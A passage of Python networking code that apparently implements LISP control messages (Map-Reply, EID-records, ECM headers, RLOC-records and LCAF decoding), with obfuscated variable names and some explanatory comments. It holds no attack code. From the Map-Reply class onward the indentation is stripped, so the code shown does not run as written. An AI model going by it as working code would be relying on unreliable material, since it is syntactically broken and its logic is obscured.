                        if (new_keying):
                            lprint("{} for RLOC {}".format(
                                bold("New decap-keying", False),
                                red(addr_str, False)))
                        key.compute_shared_key("decap")
                        key.add_key_by_rloc(addr_str, False)

            self.itr_rlocs.append(itr_rloc)
            itr_rloc_count -= 1

        format_size = struct.calcsize("BBH")
        if (len(packet) < format_size): return(None)

        subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
        self.subscribe_bit = (subscribe & 0x80)
        self.target_eid.afi = socket.ntohs(afi)
        packet = packet[format_size::]

        self.target_eid.mask_len = mask_len
        if (self.target_eid.afi == LISP_AFI_LCAF):
            packet, group = self.target_eid.lcaf_decode_eid(packet)
            if (packet == None): return(None)
            if (group): self.target_group = group
        else:
            packet = self.target_eid.unpack_address(packet)
            if (packet == None): return(None)
            packet = packet[format_size::]
        return(packet)
    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.target_eid, self.target_group))

    def encode_xtr_id(self, packet):
        xtr_id_upper = self.xtr_id >> 64
        xtr_id_lower = self.xtr_id & 0xffffffffffffffff
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
        return(packet)

    def decode_xtr_id(self, packet):
        format_size = struct.calcsize("QQ")
        if (len(packet) < format_size): return(None)
        packet = packet[len(packet) - format_size::]
        xtr_id_upper, xtr_id_lower = struct.unpack("QQ",
            packet[:format_size])
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
        return(True)
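#
# lisp_map_reply() - parse and build the fixed header of a LISP
# Map-Reply message (RFC 6830, type 2): the R (RLOC-probe), E
# (echo-nonce capable) and S (security) flag bits, a hop-count packed
# into the reserved field by this implementation, a record count, and
# the 64-bit nonce copied from the soliciting Map-Request. A minimal
# usage sketch:
#
#   mr = lisp_map_reply()
#   mr.rloc_probe = True
#   mr.record_count = 1
#   mr.nonce = 0x1234
#   header = mr.encode()     # 12-byte Map-Reply header
#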
class lisp_map_reply ( object ) :
def __init__ ( self ) :
self . rloc_probe = False
self . echo_nonce_capable = False
self . security = False
self . record_count = 0
self . hop_count = 0
self . nonce = 0
self . keys = None
def print_map_reply ( self ) :
IiiiI1 = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + "nonce: 0x{}"
lprint ( IiiiI1 . format ( bold ( "Map-Reply" , False ) , "R" if self . rloc_probe else "r" ,
"E" if self . echo_nonce_capable else "e" ,
"S" if self . security else "s" , self . hop_count , self . record_count ,
lisp_hex_string ( self . nonce ) ) )
def encode ( self ) :
iIiIii = ( LISP_MAP_REPLY << 28 ) | self . record_count
iIiIii |= self . hop_count << 8
if ( self . rloc_probe ) : iIiIii |= 0x08000000
if ( self . echo_nonce_capable ) : iIiIii |= 0x04000000
if ( self . security ) : iIiIii |= 0x02000000
Oo00oo = struct . pack ( "I" , socket . htonl ( iIiIii ) )
Oo00oo += struct . pack ( "Q" , self . nonce )
return ( Oo00oo )
def decode ( self , packet ) :
iiII1iiI = "I"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
iIiIii = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
iIiIii = iIiIii [ 0 ]
packet = packet [ ooo0000oo0 : : ]
iiII1iiI = "Q"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
o0Oo0o = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
packet = packet [ ooo0000oo0 : : ]
iIiIii = socket . ntohl ( iIiIii )
self . rloc_probe = True if ( iIiIii & 0x08000000 ) else False
self . echo_nonce_capable = True if ( iIiIii & 0x04000000 ) else False
self . security = True if ( iIiIii & 0x02000000 ) else False
self . hop_count = ( iIiIii >> 8 ) & 0xff
self . record_count = iIiIii & 0xff
self . nonce = o0Oo0o [ 0 ]
if ( self . nonce in lisp_crypto_keys_by_nonce ) :
self . keys = lisp_crypto_keys_by_nonce [ self . nonce ]
self . keys [ 1 ] . delete_key_by_nonce ( self . nonce )
return ( packet )
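#
# lisp_eid_record() - one EID-record, the per-prefix portion shared by
# Map-Request, Map-Reply, Map-Register, and Map-Referral messages. It
# carries the record TTL, RLOC count, action and authoritative bits,
# the ddt-incomplete flag, a signature count, a map-version, and the
# EID-prefix itself, which is LCAF-encoded when it has a nonzero
# instance-id, is an (S,G) entry, or is a geo-coordinate.
#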
class lisp_eid_record ( object ) :
def __init__ ( self ) :
self . record_ttl = 0
self . rloc_count = 0
self . action = 0
self . authoritative = False
self . ddt_incomplete = False
self . signature_count = 0
self . map_version = 0
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
def print_prefix ( self ) :
if ( self . group . is_null ( ) ) :
return ( green ( self . eid . print_prefix ( ) , False ) )
return ( green ( self . eid . print_sg ( self . group ) , False ) )
def print_ttl ( self ) :
O0O00O = self . record_ttl
if ( self . record_ttl & 0x80000000 ) :
O0O00O = str ( self . record_ttl & 0x7fffffff ) + " secs"
elif ( ( O0O00O % 60 ) == 0 ) :
O0O00O = str ( old_div ( O0O00O , 60 ) ) + " hours"
else :
O0O00O = str ( O0O00O ) + " mins"
return ( O0O00O )
def store_ttl ( self ) :
O0O00O = self . record_ttl * 60
if ( self . record_ttl & 0x80000000 ) : O0O00O = self . record_ttl & 0x7fffffff
return ( O0O00O )
def print_record ( self , indent , ddt ) :
oO00O0o0Oo = ""
I1IIiIiIIiIiI = ""
IIi1iiIII11 = bold ( "invalid-action" , False )
if ( ddt ) :
if ( self . action < len ( lisp_map_referral_action_string ) ) :
IIi1iiIII11 = lisp_map_referral_action_string [ self . action ]
IIi1iiIII11 = bold ( IIi1iiIII11 , False )
oO00O0o0Oo = ( ", " + bold ( "ddt-incomplete" , False ) ) if self . ddt_incomplete else ""
I1IIiIiIIiIiI = ( ", sig-count: " + str ( self . signature_count ) ) if ( self . signature_count != 0 ) else ""
else :
if ( self . action < len ( lisp_map_reply_action_string ) ) :
IIi1iiIII11 = lisp_map_reply_action_string [ self . action ]
if ( self . action != LISP_NO_ACTION ) :
IIi1iiIII11 = bold ( IIi1iiIII11 , False )
i1I1iiiI = LISP_AFI_LCAF if ( self . eid . afi < 0 ) else self . eid . afi
IiiiI1 = ( "{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}" )
lprint ( IiiiI1 . format ( indent , self . print_ttl ( ) , self . rloc_count ,
IIi1iiIII11 , "auth" if ( self . authoritative is True ) else "non-auth" ,
oO00O0o0Oo , I1IIiIiIIiIiI , self . map_version , i1I1iiiI ,
green ( self . print_prefix ( ) , False ) ) )
def encode ( self ) :
oOoO0OooO0O = self . action << 13
if ( self . authoritative ) : oOoO0OooO0O |= 0x1000
if ( self . ddt_incomplete ) : oOoO0OooO0O |= 0x800
i1I1iiiI = self . eid . afi if ( self . eid . instance_id == 0 ) else LISP_AFI_LCAF
if ( i1I1iiiI < 0 ) : i1I1iiiI = LISP_AFI_LCAF
I1iiIiI1II1ii = ( self . group . is_null ( ) == False )
if ( I1iiIiI1II1ii ) : i1I1iiiI = LISP_AFI_LCAF
iii1I = ( self . signature_count << 12 ) | self . map_version
OOOoOo0o0Ooo = 0 if self . eid . is_binary ( ) == False else self . eid . mask_len
Oo00oo = struct . pack ( "IBBHHH" , socket . htonl ( self . record_ttl ) ,
self . rloc_count , OOOoOo0o0Ooo , socket . htons ( oOoO0OooO0O ) ,
socket . htons ( iii1I ) , socket . htons ( i1I1iiiI ) )
if ( I1iiIiI1II1ii ) :
Oo00oo += self . eid . lcaf_encode_sg ( self . group )
return ( Oo00oo )
if ( self . eid . afi == LISP_AFI_GEO_COORD and self . eid . instance_id == 0 ) :
Oo00oo = Oo00oo [ 0 : - 2 ]
Oo00oo += self . eid . address . encode_geo ( )
return ( Oo00oo )
if ( i1I1iiiI == LISP_AFI_LCAF ) :
Oo00oo += self . eid . lcaf_encode_iid ( )
return ( Oo00oo )
Oo00oo += self . eid . pack_address ( )
return ( Oo00oo )
def decode ( self , packet ) :
iiII1iiI = "IBBHHH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
self . record_ttl , self . rloc_count , self . eid . mask_len , oOoO0OooO0O , self . map_version , self . eid . afi = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
self . record_ttl = socket . ntohl ( self . record_ttl )
oOoO0OooO0O = socket . ntohs ( oOoO0OooO0O )
self . action = ( oOoO0OooO0O >> 13 ) & 0x7
self . authoritative = True if ( ( oOoO0OooO0O >> 12 ) & 1 ) else False
self . ddt_incomplete = True if ( ( oOoO0OooO0O >> 11 ) & 1 ) else False
self . map_version = socket . ntohs ( self . map_version )
self . signature_count = self . map_version >> 12
self . map_version = self . map_version & 0xfff
self . eid . afi = socket . ntohs ( self . eid . afi )
self . eid . instance_id = 0
packet = packet [ ooo0000oo0 : : ]
if ( self . eid . afi == LISP_AFI_LCAF ) :
packet , oo0oOooo0O = self . eid . lcaf_decode_eid ( packet )
if ( oo0oOooo0O ) : self . group = oo0oOooo0O
self . group . instance_id = self . eid . instance_id
return ( packet )
packet = self . eid . unpack_address ( packet )
return ( packet )
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
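#
# lisp_ecm() - the Encapsulated Control Message header: a LISP ECM
# flags word (S/D/E/M bits) followed by an inner IPv4 or IPv6 header
# and an inner UDP header wrapping the control message being forwarded.
# encode() also computes the inner IPv4 header checksum via
# lisp_ip_checksum().
#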
class lisp_ecm ( object ) :
def __init__ ( self , sport ) :
self . security = False
self . ddt = False
self . to_etr = False
self . to_ms = False
self . length = 0
self . ttl = LISP_DEFAULT_ECM_TTL
self . protocol = LISP_UDP_PROTOCOL
self . ip_checksum = 0
self . source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . udp_sport = sport
self . udp_dport = LISP_CTRL_PORT
self . udp_checksum = 0
self . udp_length = 0
self . afi = LISP_AFI_NONE
def print_ecm ( self ) :
IiiiI1 = ( "{} -> flags: {}{}{}{}, " + "inner IP: {} -> {}, inner UDP: {} -> {}" )
lprint ( IiiiI1 . format ( bold ( "ECM" , False ) , "S" if self . security else "s" ,
"D" if self . ddt else "d" , "E" if self . to_etr else "e" ,
"M" if self . to_ms else "m" ,
green ( self . source . print_address ( ) , False ) ,
green ( self . dest . print_address ( ) , False ) , self . udp_sport ,
self . udp_dport ) )
def encode ( self , packet , inner_source , inner_dest ) :
self . udp_length = len ( packet ) + 8
self . source = inner_source
self . dest = inner_dest
if ( inner_dest . is_ipv4 ( ) ) :
self . afi = LISP_AFI_IPV4
self . length = self . udp_length + 20
if ( inner_dest . is_ipv6 ( ) ) :
self . afi = LISP_AFI_IPV6
self . length = self . udp_length
iIiIii = ( LISP_ECM << 28 )
if ( self . security ) : iIiIii |= 0x08000000
if ( self . ddt ) : iIiIii |= 0x04000000
if ( self . to_etr ) : iIiIii |= 0x02000000
if ( self . to_ms ) : iIiIii |= 0x01000000
III1iI1III1I1 = struct . pack ( "I" , socket . htonl ( iIiIii ) )
  O0O = b""
if ( self . afi == LISP_AFI_IPV4 ) :
O0O = struct . pack ( "BBHHHBBH" , 0x45 , 0 , socket . htons ( self . length ) ,
0 , 0 , self . ttl , self . protocol , socket . htons ( self . ip_checksum ) )
O0O += self . source . pack_address ( )
O0O += self . dest . pack_address ( )
O0O = lisp_ip_checksum ( O0O )
if ( self . afi == LISP_AFI_IPV6 ) :
O0O = struct . pack ( "BBHHBB" , 0x60 , 0 , 0 , socket . htons ( self . length ) ,
self . protocol , self . ttl )
O0O += self . source . pack_address ( )
O0O += self . dest . pack_address ( )
I111 = socket . htons ( self . udp_sport )
IiI11I111 = socket . htons ( self . udp_dport )
oOO0O00o0O0 = socket . htons ( self . udp_length )
I1i11i = socket . htons ( self . udp_checksum )
O0I1II1 = struct . pack ( "HHHH" , I111 , IiI11I111 , oOO0O00o0O0 , I1i11i )
return ( III1iI1III1I1 + O0O + O0I1II1 )
def decode ( self , packet ) :
iiII1iiI = "I"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
iIiIii = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
iIiIii = socket . ntohl ( iIiIii [ 0 ] )
self . security = True if ( iIiIii & 0x08000000 ) else False
self . ddt = True if ( iIiIii & 0x04000000 ) else False
self . to_etr = True if ( iIiIii & 0x02000000 ) else False
self . to_ms = True if ( iIiIii & 0x01000000 ) else False
packet = packet [ ooo0000oo0 : : ]
if ( len ( packet ) < 1 ) : return ( None )
I1IiI = struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ]
I1IiI = I1IiI >> 4
if ( I1IiI == 4 ) :
ooo0000oo0 = struct . calcsize ( "HHIBBH" )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
Oo0OoO00O , oOO0O00o0O0 , Oo0OoO00O , IIiIIiiiiI , iIIiiIi , I1i11i = struct . unpack ( "HHIBBH" , packet [ : ooo0000oo0 ] )
self . length = socket . ntohs ( oOO0O00o0O0 )
self . ttl = IIiIIiiiiI
self . protocol = iIIiiIi
self . ip_checksum = socket . ntohs ( I1i11i )
self . source . afi = self . dest . afi = LISP_AFI_IPV4
iIIiiIi = struct . pack ( "H" , 0 )
I1I1I = struct . calcsize ( "HHIBB" )
Ii11I = struct . calcsize ( "H" )
packet = packet [ : I1I1I ] + iIIiiIi + packet [ I1I1I + Ii11I : ]
packet = packet [ ooo0000oo0 : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if ( I1IiI == 6 ) :
ooo0000oo0 = struct . calcsize ( "IHBB" )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
Oo0OoO00O , oOO0O00o0O0 , iIIiiIi , IIiIIiiiiI = struct . unpack ( "IHBB" , packet [ : ooo0000oo0 ] )
self . length = socket . ntohs ( oOO0O00o0O0 )
self . protocol = iIIiiIi
self . ttl = IIiIIiiiiI
self . source . afi = self . dest . afi = LISP_AFI_IPV6
packet = packet [ ooo0000oo0 : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . source . mask_len = self . source . host_mask_len ( )
self . dest . mask_len = self . dest . host_mask_len ( )
ooo0000oo0 = struct . calcsize ( "HHHH" )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
I111 , IiI11I111 , oOO0O00o0O0 , I1i11i = struct . unpack ( "HHHH" , packet [ : ooo0000oo0 ] )
self . udp_sport = socket . ntohs ( I111 )
self . udp_dport = socket . ntohs ( IiI11I111 )
self . udp_length = socket . ntohs ( oOO0O00o0O0 )
self . udp_checksum = socket . ntohs ( I1i11i )
packet = packet [ ooo0000oo0 : : ]
return ( packet )
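#
# lisp_rloc_record() - one RLOC-record of an EID-record: unicast and
# multicast priority/weight, the L/P/R (local/probe/reachable) flag
# bits, and the locator itself. The locator may be a plain AFI-encoded
# address or an LCAF encoding that additionally carries a distinguished
# name, geo-coordinates, an ELP, an RLE, a JSON blob, or security key
# material.
#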
class lisp_rloc_record ( object ) :
def __init__ ( self ) :
self . priority = 0
self . weight = 0
self . mpriority = 0
self . mweight = 0
self . local_bit = False
self . probe_bit = False
self . reach_bit = False
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . rloc_name = None
self . keys = None
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
oOo = self . rloc_name
if ( cour ) : oOo = lisp_print_cour ( oOo )
return ( 'rloc-name: {}' . format ( blue ( oOo , cour ) ) )
def print_record ( self , indent ) :
IIIOo0O = self . print_rloc_name ( )
if ( IIIOo0O != "" ) : IIIOo0O = ", " + IIIOo0O
oOIIi = ""
if ( self . geo ) :
ooO0o = ""
if ( self . geo . geo_name ) : ooO0o = "'{}' " . format ( self . geo . geo_name )
oOIIi = ", geo: {}{}" . format ( ooO0o , self . geo . print_geo ( ) )
iIII1Iiii = ""
if ( self . elp ) :
ooO0o = ""
if ( self . elp . elp_name ) : ooO0o = "'{}' " . format ( self . elp . elp_name )
iIII1Iiii = ", elp: {}{}" . format ( ooO0o , self . elp . print_elp ( True ) )
IIIi1iI1 = ""
if ( self . rle ) :
ooO0o = ""
if ( self . rle . rle_name ) : ooO0o = "'{}' " . format ( self . rle . rle_name )
IIIi1iI1 = ", rle: {}{}" . format ( ooO0o , self . rle . print_rle ( False ,
True ) )
IiiiIiii = ""
if ( self . json ) :
ooO0o = ""
if ( self . json . json_name ) :
ooO0o = "'{}' " . format ( self . json . json_name )
IiiiIiii = ", json: {}" . format ( self . json . print_json ( False ) )
ooOoOO0Oo0oO0o = ""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
ooOoOO0Oo0oO0o = ", " + self . keys [ 1 ] . print_keys ( )
IiiiI1 = ( "{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}" )
lprint ( IiiiI1 . format ( indent , self . print_flags ( ) , self . priority ,
self . weight , self . mpriority , self . mweight , self . rloc . afi ,
red ( self . rloc . print_address_no_iid ( ) , False ) , IIIOo0O , oOIIi ,
iIII1Iiii , IIIi1iI1 , IiiiIiii , ooOoOO0Oo0oO0o ) )
def print_flags ( self ) :
return ( "{}{}{}" . format ( "L" if self . local_bit else "l" , "P" if self . probe_bit else "p" , "R" if self . reach_bit else "r" ) )
def store_rloc_entry ( self , rloc_entry ) :
iIIiI11 = rloc_entry . rloc if ( rloc_entry . translated_rloc . is_null ( ) ) else rloc_entry . translated_rloc
self . rloc . copy_address ( iIIiI11 )
if ( rloc_entry . rloc_name ) :
self . rloc_name = rloc_entry . rloc_name
if ( rloc_entry . geo ) :
self . geo = rloc_entry . geo
else :
ooO0o = rloc_entry . geo_name
if ( ooO0o and ooO0o in lisp_geo_list ) :
self . geo = lisp_geo_list [ ooO0o ]
if ( rloc_entry . elp ) :
self . elp = rloc_entry . elp
else :
ooO0o = rloc_entry . elp_name
if ( ooO0o and ooO0o in lisp_elp_list ) :
self . elp = lisp_elp_list [ ooO0o ]
if ( rloc_entry . rle ) :
self . rle = rloc_entry . rle
else :
ooO0o = rloc_entry . rle_name
if ( ooO0o and ooO0o in lisp_rle_list ) :
self . rle = lisp_rle_list [ ooO0o ]
if ( rloc_entry . json ) :
self . json = rloc_entry . json
else :
ooO0o = rloc_entry . json_name
if ( ooO0o and ooO0o in lisp_json_list ) :
self . json = lisp_json_list [ ooO0o ]
self . priority = rloc_entry . priority
self . weight = rloc_entry . weight
self . mpriority = rloc_entry . mpriority
self . mweight = rloc_entry . mweight
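 #
 # encode_json() - emit the locator's JSON string as a JSON-type LCAF.
 # The JSON key-id and encrypted bit ride in the LCAF flags byte. The
 # RLOC AFI and address are appended only when the JSON is telemetry
 # (see lisp_is_json_telemetry()); otherwise a zero AFI is written.
 #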
def encode_json ( self , lisp_json ) :
OoOo00OO0o00 = lisp_json . json_string
iIii1iii1 = 0
if ( lisp_json . json_encrypted ) :
iIii1iii1 = ( lisp_json . json_key_id << 5 ) | 0x02
ooOoOoOo = LISP_LCAF_JSON_TYPE
ii1 = socket . htons ( LISP_AFI_LCAF )
OoOOo0Oo0o0 = self . rloc . addr_length ( ) + 2
iIIIi1Iii1 = socket . htons ( len ( OoOo00OO0o00 ) + OoOOo0Oo0o0 )
oOoOOOo0oo = socket . htons ( len ( OoOo00OO0o00 ) )
Oo00oo = struct . pack ( "HBBBBHH" , ii1 , 0 , 0 , ooOoOoOo , iIii1iii1 ,
iIIIi1Iii1 , oOoOOOo0oo )
Oo00oo += OoOo00OO0o00 . encode ( )
if ( lisp_is_json_telemetry ( OoOo00OO0o00 ) ) :
Oo00oo += struct . pack ( "H" , socket . htons ( self . rloc . afi ) )
Oo00oo += self . rloc . pack_address ( )
else :
Oo00oo += struct . pack ( "H" , 0 )
return ( Oo00oo )
def encode_lcaf ( self ) :
ii1 = socket . htons ( LISP_AFI_LCAF )
Ii1IIII1i = b""
if ( self . geo ) :
Ii1IIII1i = self . geo . encode_geo ( )
I1IIiIi = b""
if ( self . elp ) :
iiII11iI11i1I = b""
for oo0o in self . elp . elp_nodes :
i1I1iiiI = socket . htons ( oo0o . address . afi )
Ooo0000o = 0
if ( oo0o . eid ) : Ooo0000o |= 0x4
if ( oo0o . probe ) : Ooo0000o |= 0x2
if ( oo0o . strict ) : Ooo0000o |= 0x1
Ooo0000o = socket . htons ( Ooo0000o )
iiII11iI11i1I += struct . pack ( "HH" , Ooo0000o , i1I1iiiI )
iiII11iI11i1I += oo0o . address . pack_address ( )
OOii1II1IiIIiI = socket . htons ( len ( iiII11iI11i1I ) )
I1IIiIi = struct . pack ( "HBBBBH" , ii1 , 0 , 0 , LISP_LCAF_ELP_TYPE ,
0 , OOii1II1IiIIiI )
I1IIiIi += iiII11iI11i1I
II1i = b""
if ( self . rle ) :
oOO0Oo = b""
for iIIi in self . rle . rle_nodes :
i1I1iiiI = socket . htons ( iIIi . address . afi )
oOO0Oo += struct . pack ( "HBBH" , 0 , 0 , iIIi . level , i1I1iiiI )
oOO0Oo += iIIi . address . pack_address ( )
if ( iIIi . rloc_name ) :
oOO0Oo += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
oOO0Oo += ( iIIi . rloc_name + "\0" ) . encode ( )
O0ooO0 = socket . htons ( len ( oOO0Oo ) )
II1i = struct . pack ( "HBBBBH" , ii1 , 0 , 0 , LISP_LCAF_RLE_TYPE ,
0 , O0ooO0 )
II1i += oOO0Oo
i1II11 = b""
if ( self . json ) :
i1II11 = self . encode_json ( self . json )
i1Ii11I = b""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
i1Ii11I = self . keys [ 1 ] . encode_lcaf ( self . rloc )
I11Ii1I1i = b""
if ( self . rloc_name ) :
I11Ii1I1i += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
I11Ii1I1i += ( self . rloc_name + "\0" ) . encode ( )
oOooOoO0oo = len ( Ii1IIII1i ) + len ( I1IIiIi ) + len ( II1i ) + len ( i1Ii11I ) + 2 + len ( i1II11 ) + self . rloc . addr_length ( ) + len ( I11Ii1I1i )
oOooOoO0oo = socket . htons ( oOooOoO0oo )
IiIi11iiIi1 = struct . pack ( "HBBBBHH" , ii1 , 0 , 0 , LISP_LCAF_AFI_LIST_TYPE ,
0 , oOooOoO0oo , socket . htons ( self . rloc . afi ) )
IiIi11iiIi1 += self . rloc . pack_address ( )
return ( IiIi11iiIi1 + I11Ii1I1i + Ii1IIII1i + I1IIiIi + II1i + i1Ii11I + i1II11 )
def encode ( self ) :
Ooo0000o = 0
if ( self . local_bit ) : Ooo0000o |= 0x0004
if ( self . probe_bit ) : Ooo0000o |= 0x0002
if ( self . reach_bit ) : Ooo0000o |= 0x0001
Oo00oo = struct . pack ( "BBBBHH" , self . priority , self . weight ,
self . mpriority , self . mweight , socket . htons ( Ooo0000o ) ,
socket . htons ( self . rloc . afi ) )
if ( self . geo or self . elp or self . rle or self . keys or self . rloc_name or self . json ) :
try :
Oo00oo = Oo00oo [ 0 : - 2 ] + self . encode_lcaf ( )
except :
lprint ( "Could not encode LCAF for RLOC-record" )
else :
Oo00oo += self . rloc . pack_address ( )
return ( Oo00oo )
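 #
 # decode_lcaf() - parse an LCAF-encoded locator, dispatching on the
 # LCAF type. AFI-list, geo-coord, JSON, ELP, RLE, and security types
 # are understood; unrecognized types are skipped over by their encoded
 # length. The security case runs the encap-keying logic, comparing any
 # stored unicast keys against the keys the peer supplied.
 #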
def decode_lcaf ( self , packet , nonce , ms_json_encrypt ) :
iiII1iiI = "HBBBBH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
i1I1iiiI , Ii1Ii1Ii , Ooo0000o , ooOoOoOo , ii11Ii1111 , iIIIi1Iii1 = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
iIIIi1Iii1 = socket . ntohs ( iIIIi1Iii1 )
packet = packet [ ooo0000oo0 : : ]
if ( iIIIi1Iii1 > len ( packet ) ) : return ( None )
if ( ooOoOoOo == LISP_LCAF_AFI_LIST_TYPE ) :
while ( iIIIi1Iii1 > 0 ) :
iiII1iiI = "H"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( iIIIi1Iii1 < ooo0000oo0 ) : return ( None )
oo = len ( packet )
i1I1iiiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
i1I1iiiI = socket . ntohs ( i1I1iiiI )
if ( i1I1iiiI == LISP_AFI_LCAF ) :
packet = self . decode_lcaf ( packet , nonce , ms_json_encrypt )
if ( packet == None ) : return ( None )
else :
packet = packet [ ooo0000oo0 : : ]
self . rloc_name = None
if ( i1I1iiiI == LISP_AFI_NAME ) :
packet , oOo = lisp_decode_dist_name ( packet )
self . rloc_name = oOo
else :
self . rloc . afi = i1I1iiiI
packet = self . rloc . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
iIIIi1Iii1 -= oo - len ( packet )
elif ( ooOoOoOo == LISP_LCAF_GEO_COORD_TYPE ) :
Ooo0O00o00 = lisp_geo ( "" )
packet = Ooo0O00o00 . decode_geo ( packet , iIIIi1Iii1 , ii11Ii1111 )
if ( packet == None ) : return ( None )
self . geo = Ooo0O00o00
elif ( ooOoOoOo == LISP_LCAF_JSON_TYPE ) :
oo0oO = ii11Ii1111 & 0x02
iiII1iiI = "H"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( iIIIi1Iii1 < ooo0000oo0 ) : return ( None )
oOoOOOo0oo = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
oOoOOOo0oo = socket . ntohs ( oOoOOOo0oo )
if ( iIIIi1Iii1 < ooo0000oo0 + oOoOOOo0oo ) : return ( None )
packet = packet [ ooo0000oo0 : : ]
self . json = lisp_json ( "" , packet [ 0 : oOoOOOo0oo ] , oo0oO ,
ms_json_encrypt )
packet = packet [ oOoOOOo0oo : : ]
i1I1iiiI = socket . ntohs ( struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ] )
packet = packet [ 2 : : ]
if ( i1I1iiiI != 0 and lisp_is_json_telemetry ( self . json . json_string ) ) :
self . rloc . afi = i1I1iiiI
packet = self . rloc . unpack_address ( packet )
elif ( ooOoOoOo == LISP_LCAF_ELP_TYPE ) :
I1iI1 = lisp_elp ( None )
I1iI1 . elp_nodes = [ ]
while ( iIIIi1Iii1 > 0 ) :
Ooo0000o , i1I1iiiI = struct . unpack ( "HH" , packet [ : 4 ] )
i1I1iiiI = socket . ntohs ( i1I1iiiI )
if ( i1I1iiiI == LISP_AFI_LCAF ) : return ( None )
oo0o = lisp_elp_node ( )
I1iI1 . elp_nodes . append ( oo0o )
Ooo0000o = socket . ntohs ( Ooo0000o )
oo0o . eid = ( Ooo0000o & 0x4 )
oo0o . probe = ( Ooo0000o & 0x2 )
oo0o . strict = ( Ooo0000o & 0x1 )
oo0o . address . afi = i1I1iiiI
oo0o . address . mask_len = oo0o . address . host_mask_len ( )
packet = oo0o . address . unpack_address ( packet [ 4 : : ] )
iIIIi1Iii1 -= oo0o . address . addr_length ( ) + 4
I1iI1 . select_elp_node ( )
self . elp = I1iI1
elif ( ooOoOoOo == LISP_LCAF_RLE_TYPE ) :
ooo0o0O = lisp_rle ( None )
ooo0o0O . rle_nodes = [ ]
while ( iIIIi1Iii1 > 0 ) :
Oo0OoO00O , ii1I1I1iII , ii11i , i1I1iiiI = struct . unpack ( "HBBH" , packet [ : 6 ] )
i1I1iiiI = socket . ntohs ( i1I1iiiI )
if ( i1I1iiiI == LISP_AFI_LCAF ) : return ( None )
iIIi = lisp_rle_node ( )
ooo0o0O . rle_nodes . append ( iIIi )
iIIi . level = ii11i
iIIi . address . afi = i1I1iiiI
iIIi . address . mask_len = iIIi . address . host_mask_len ( )
packet = iIIi . address . unpack_address ( packet [ 6 : : ] )
iIIIi1Iii1 -= iIIi . address . addr_length ( ) + 6
if ( iIIIi1Iii1 >= 2 ) :
i1I1iiiI = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
if ( socket . ntohs ( i1I1iiiI ) == LISP_AFI_NAME ) :
packet = packet [ 2 : : ]
packet , iIIi . rloc_name = lisp_decode_dist_name ( packet )
if ( packet == None ) : return ( None )
iIIIi1Iii1 -= len ( iIIi . rloc_name ) + 1 + 2
self . rle = ooo0o0O
self . rle . build_forwarding_list ( )
elif ( ooOoOoOo == LISP_LCAF_SECURITY_TYPE ) :
i1o0o0oOO = packet
iIiiIi1111ii = lisp_keys ( 1 )
packet = iIiiIi1111ii . decode_lcaf ( i1o0o0oOO , iIIIi1Iii1 )
if ( packet == None ) : return ( None )
OoOO0Ooo = [ LISP_CS_25519_CBC , LISP_CS_25519_CHACHA ]
if ( iIiiIi1111ii . cipher_suite in OoOO0Ooo ) :
if ( iIiiIi1111ii . cipher_suite == LISP_CS_25519_CBC ) :
III = lisp_keys ( 1 , do_poly = False , do_chacha = False )
